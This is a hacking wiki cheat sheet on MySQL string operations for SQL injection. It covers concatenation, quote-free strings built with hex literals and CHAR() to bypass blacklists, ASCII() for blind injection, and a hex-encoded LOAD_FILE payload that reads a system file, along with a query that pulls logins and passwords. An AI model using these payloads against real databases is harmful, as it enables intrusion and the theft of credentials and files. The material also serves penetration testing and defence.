hacking:sql_injection:mysql:string_operations
Table of Contents
Hacking - SQL Injection - MySQL - String Operations
String related operations can be quite useful to build up injections which are not using any quotes, bypass any other black listing or determine back end database.
String Concatenation
|| SELECT login || '-' || password FROM members
NOTE: About MySQL “||”
If MySQL is running in ANSI mode it's going to work but otherwise MySQL accepts it as a `logical operator` and will return 0.
A better way to do it is using CONCAT() function in MySQL:
CONCAT(str1, str2, str3, ...) (M) /* Concatenate supplied strings. */ SELECT CONCAT(login, password) FROM members
Strings without Quotes
These are some direct ways to using strings but it's always possible to use CHAR() to generate string without quotes.
0x457578 /* Hex Representation of string. */ SELECT 0x457578 /* This will be selected as string in MySQL.*/
In MySQL easy way to generate hex representations of strings use this;
SELECT CONCAT('0x',HEX('c:\\boot.ini')) SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) /* This will return 'KLM'. */
Hex based SQL Injection Samples
SELECT LOAD_FILE(0x633A5C626F6F742E696E69) /* This will show the content of c:\boot.ini */
String Modification & Related
Return ASCII character value of leftmost character.
ASCII() SELECT ASCII('a')
A must have function for Blind SQL Injections.
Convert an integer of ASCII.
CHAR() SELECT CHAR(64)
hacking/sql_injection/mysql/string_operations.txt · Last modified: 2020/07/15 09:30 by 127.0.0.1